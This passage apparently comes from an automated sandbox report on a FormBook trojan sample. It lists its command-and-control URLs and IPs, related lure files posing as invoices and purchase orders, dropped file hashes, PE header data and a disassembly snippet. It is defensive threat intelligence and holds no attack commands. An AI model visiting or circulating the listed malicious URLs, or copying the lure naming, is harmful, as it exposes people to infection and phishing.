                                                    		unknown
                                                    http://www.sailnway.net/lrst/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tekilla.wtf/fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak=true
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutlenetbtugc.exe, 00000006.00000002.4153839675.00000000042D8000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.00000000039A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000CC28000.00000004.80000000.00040000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.gandi.net/en/domainnetbtugc.exe, 00000006.00000002.4155375798.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 00000006.00000002.4153839675.0000000004920000.00000004.10000000.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.0000000003FF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIuDJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000495C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sailnway.netDJonRIGNYjBRZ.exe, 00000007.00000002.4154876608.0000000005794000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000003.2291514949.0000000007CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    172.191.244.62
                                                    		redirect.3dns.boxUnited States
                                                    		7018ATT-INTERNET4UStrue
                                                    63.250.47.40
                                                    		www.kexweb.topUnited States
                                                    		22612NAMECHEAP-NETUStrue
                                                    13.248.169.48
                                                    		www.dyme.techUnited States
                                                    		16509AMAZON-02UStrue
                                                    91.184.0.200
                                                    		jobworklanka.onlineNetherlands
                                                    		197902HOSTNETNLtrue
                                                    172.96.191.39
                                                    		bola88site.oneCanada
                                                    		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                    103.224.182.242
                                                    		www.nobartv6.websiteAustralia
                                                    		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                    217.70.184.50
                                                    		webredir.vip.gandi.netFrance
                                                    		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                    148.72.152.174
                                                    		www.elsupertodo.netUnited States
                                                    		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                    3.33.130.190
                                                    		omexai.infoUnited States
                                                    		8987AMAZONEXPANSIONGBtrue
                                                    85.159.66.93
                                                    		natroredirect.natrocdn.comTurkey
                                                    		34619CIZGITRtrue
                                                    43.242.202.169
                                                    		www.mizuquan.topHong Kong
                                                    		40065CNSERVERSUStrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1519260
                                                    Start date and time:2024-09-26 09:22:07 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 56s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:CITA#U00c7#U00c3O.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:CITAO.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@14/11
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 92%
                                                    • Number of executed functions: 55
                                                    • Number of non-executed functions: 299
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • VT rate limit hit for: CITA#U00c7#U00c3O.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    03:24:07API Interceptor9836727x Sleep call for process: netbtugc.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    172.191.244.62CYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                    • www.lurknlarkk.xyz/cjjz/
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/f3mz/
                                                    DN.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/f3mz/
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/lmxx/
                                                    63.250.47.40CYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.brupack.online/t8b6/
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                    • www.balclub.top/n6ow/
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/mfb2/
                                                    ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/mfb2/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.nobartv6.websiteCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
                                                    webredir.vip.gandi.netrP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    CYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PO098765678.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    www.elsupertodo.netCYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                                    • 148.72.152.174
                                                    www.kexweb.topCYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40
                                                    ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.47.40

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ATT-INTERNET4UShttps://is.gd/fxcRirGet hashmaliciousUnknownBrowse
                                                    • 13.32.27.6
                                                    https://cancelar-plan-pr0teccion1.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                    • 13.32.27.23
                                                    https://mail-105280.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.67
                                                    https://telstra-104088.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.68
                                                    https://mail-104478.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.67
                                                    https://telstra-102246.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.12
                                                    https://telstra-104752.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.68
                                                    https://telstra-100710.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.68
                                                    https://netzero-webmail-106103.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.32.27.68
                                                    https://sky-108991.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                    • 13.32.27.3
                                                    AMAZON-02USADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 54.228.54.207
                                                    http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                                    • 54.231.203.153
                                                    http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                    • 52.219.128.16
                                                    https://tkshopax1.cc/Get hashmaliciousUnknownBrowse
                                                    • 54.231.229.193
                                                    https://tiktok-shopsxx.top/Get hashmaliciousUnknownBrowse
                                                    • 52.217.115.225
                                                    https://sparebankno-privat.netlify.app/Get hashmaliciousUnknownBrowse
                                                    • 35.156.224.161
                                                    envifa.vbsGet hashmaliciousUnknownBrowse
                                                    • 52.216.57.225
                                                    http://banlombiavirtusucursalyfgdsffg.vercel.app/Get hashmaliciousUnknownBrowse
                                                    • 76.76.21.98
                                                    http://banlombiasucursalvirtughasd.vercel.app/Get hashmaliciousUnknownBrowse
                                                    • 143.204.98.115
                                                    http://cancelarcompravirtusucursajgbf-9mfi.vercel.app/Get hashmaliciousUnknownBrowse
                                                    • 76.76.21.98
                                                    NAMECHEAP-NETUSADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.236.169
                                                    https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29tGet hashmaliciousHTMLPhisherBrowse
                                                    • 198.54.115.105
                                                    https://recommendationshaft-facc4a.ingress-comporellon.ewp.live/wp-content/plugins/Suspendisse-vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                    • 63.250.43.6
                                                    https://zerovoid-voidic-facc4a.ingress-erytho.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                    • 63.250.43.132
                                                    https://yw2tr-d6987d.ingress-bonde.ewp.live/wp-content/plugins/deviswetransfer%202/log.phpGet hashmaliciousUnknownBrowse
                                                    • 63.250.43.2
                                                    https://dji.repair/wnfslydy.phpGet hashmaliciousUnknownBrowse
                                                    • 162.0.238.241
                                                    inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 192.64.117.204
                                                    PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.238.43
                                                    http://hscpoly.marksbookspace.shop/?/Hscpoly/Hscpoly#Bob.Jenkins@Hscpoly.Com##Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                    • 192.64.119.254
                                                    PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.19.19

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\01194HH4

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\carryover

                                                    Download File
                                                    Process:C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):286720
                                                    Entropy (8bit):7.994695889020294
                                                    Encrypted:true
                                                    SSDEEP:6144:NEQsw0f/fqO6JlDnqw4saEU+wXjeRMx0UwZAfmxJAZb3ND73:JWf6O6nnJzwyMOUq3AZbN
                                                    MD5:67A3D610BA763BF9CE42D8F788A9F942
                                                    SHA1:0D6A3D6A8A1F0A3B4AB71DCDFCCA0F90784E0060
                                                    SHA-256:EAD20351C361ABC7AB3E8A1D0CEB67472A15635EC8F032D6FECB69A29F19474A
                                                    SHA-512:4B89C6225C71DA817E3F6DA5DB246DF186FE6CA88E2E66BB9D5A9F5BFF88F03AD89765BEB83AD28F1135466A35950D8BA0180D019078A50E9D052DF5200C0D80
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.b...JZ8Y...^.....X1...z4B...C4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6.X2Z6E.9J.1.b.@....?_1xB(W= V'z[8-Z.#oS/wD76.3Vz.x.zU6'QoZB;nW6BX2Z8#S>.gX>..!0..*0.X....:5.P....T&.U..."?..Q9:.*=.YC4AWO1J.sBX~[9Z.`.8YC4AWO1.W4CS3Q8Z.3JZ8YC4AWO!^W6BH2Z8:V7JZxYC$AWO3JW0BX2Z8ZR1JZ8YC4AW/5JW4BX2Z8ZP7..8YS4AGO1JW&BX"Z8ZR7JJ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4Ay;T2#6BXV.<ZR'JZ8.G4AGO1JW6BX2Z8ZR7Jz8Y#4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AW

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.536706033611225
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:CITA#U00c7#U00c3O.exe
                                                    File size:1'353'653 bytes
                                                    MD5:05643e059a165f8b6b3b3e4bd0d9f226
                                                    SHA1:c1ba7b632f31db543ef178fbd9d48809bf1c2eca
                                                    SHA256:ec4594c01b27748273f47aeefc3fc2f3bc67af0b55a72ccd129936bfb0b715b1
                                                    SHA512:e6a2c6334cdc6c9a4d2eef09212fc0d8e7590eddd1a26a9d6fce58edfc1d75766c6a3492848f81f46a8e0efac54d6ef3b2ae2902beb7f3ef38d3e9e39089a433
                                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCIlRLBaKj3owIU92HBvywGMK:7JZoQrbTFZY1iaCIlR1aKj3os9WBvij
                                                    TLSH:AD55F122F5D68076C1B323B19E7EF7AA9A3D79360336D19737C82D211EA05412B39763
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                    File Icon

                                                    Icon Hash:1733312925935517

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4165c1
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FB944F0F06Bh
                                                    jmp 00007FB944F05EDEh
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push ebp
                                                    mov ebp, esp
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [ebp+0Ch]
                                                    mov ecx, dword ptr [ebp+10h]
                                                    mov edi, dword ptr [ebp+08h]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FB944F0605Ah
                                                    cmp edi, eax
                                                    jc 00007FB944F061F6h
                                                    cmp ecx, 00000080h
                                                    jc 00007FB944F0606Eh
                                                    cmp dword ptr [004A9724h], 00000000h
                                                    je 00007FB944F06065h
                                                    push edi
                                                    push esi
                                                    and edi, 0Fh
                                                    and esi, 0Fh
                                                    cmp edi, esi
                                                    pop esi
                                                    pop edi
                                                    jne 00007FB944F06057h
                                                    jmp 00007FB944F06432h
                                                    test edi, 00000003h
                                                    jne 00007FB944F06066h
                                                    shr ecx, 02h
                                                    and edx, 03h
                                                    cmp ecx, 08h
                                                    jc 00007FB944F0607Bh
                                                    rep movsd
                                                    jmp dword ptr [00416740h+edx*4]
                                                    mov eax, edi
                                                    mov edx, 00000003h
                                                    sub ecx, 04h
                                                    jc 00007FB944F0605Eh
                                                    and eax, 03h
                                                    add ecx, eax
                                                    jmp dword ptr [00416654h+eax*4]
                                                    jmp dword ptr [00416750h+ecx*4]
                                                    nop
                                                    jmp dword ptr [004166D4h+ecx*4]
                                                    nop
                                                    inc cx
                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                    inc cx
                                                    add byte ptr [ebx], ah
                                                    ror dword ptr [edx-75F877FAh], 1
                                                    inc esi
                                                    add dword ptr [eax+468A0147h], ecx
                                                    add al, cl
                                                    jmp 00007FB94737E857h
                                                    add esi, 03h
                                                    add edi, 03h
                                                    cmp ecx, 08h
                                                    jc 00007FB944F0601Eh
                                                    rep movsd
                                                    jmp dword ptr [00000000h+edx*4]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [C++] VS2010 SP1 build 40219
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
